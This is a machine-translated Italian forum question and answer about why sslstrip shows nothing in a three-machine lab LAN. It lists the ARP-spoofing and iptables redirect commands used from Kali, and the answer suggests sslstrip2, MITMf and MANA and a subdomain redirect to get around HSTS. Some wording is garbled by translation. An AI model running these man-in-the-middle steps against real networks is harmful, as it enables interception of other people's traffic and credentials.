sslstrip non funziona in LAN

1

Ho una LAN con 3 macchine collegate a uno switch. Due macchine eseguono Ubuntu 15.04, una con Apache SSL installato che funziona come server web. Un'altra macchina che esegue Ubuntu funge da client. La macchina dell'attaccante esegue Kali 2.0.

Tutte le macchine hanno gli indirizzi IP assegnati manualmente:

 Client: 192.168.1.1 HW: 08:00:27:2a:ec:cc
 Server: 192.168.1.2 HW: 00:11:22:33:44:55
 Kali:   192.168.1.3 HW: 08:00:27:fa:25:8e

Ho eseguito i seguenti comandi su Kali:

 echo 1 > /proc/sys/net/ipv4/ip_forward
 iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

E poi eseguo sslstrip -k -l 8080 .

Ora avvio arpspoof :

 arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
 arpspoof -i eth0 -t 192.168.1.2 192.168.1.1

Le tabelle arp sul client e sul server sono state entrambe falsificate e contengono l'HW della macchina Kali.

Ho anche Kharryk di cavi in esecuzione. Quando ora accedi al sito web dal server con il cliente con https://192.168.1.2/test.html viene visualizzato il sito web. Posso vedere tutti i pacchetti per l'handshake SSL / TLS anche su wireshark. Ma sslstrip non mostra nulla!?

    
posta wasp256 26.03.2016 - 23:24
fonte

1 risposta

1

Questo attacco funziona ancora per browser Web obsoleti! Ma la realtà è che la maggior parte dei server ora al giorno ha l'HSTS (HTTP Strict Transport Security) abilitata.

Quindi come sslstrip anche se HSTS desse il suo lavoro?

  1. Se utilizzi una macchina virtuale, utilizza la tua scheda di rete in modalità bridge.
  2. Usa sslstrip2 o vai per un framework MITM come MANA o MITMF tendono ad essere più stabili.
  3. Assicurati che se l'obiettivo vuole raggiungere come esempio facebook.com per reindirizzare l'obiettivo su social.facebook.com (la politica di sicurezza HSTS non ha ricordato alcun certificato) e quindi potresti eseguire un MITM SSLStrip.
  4. Assicurati di utilizzare un adattatore Wifi adeguato che supporti anche l'iniezione di pacchetti.
risposta data 27.03.2016 - 14:57
fonte

Leggi altre domande sui tag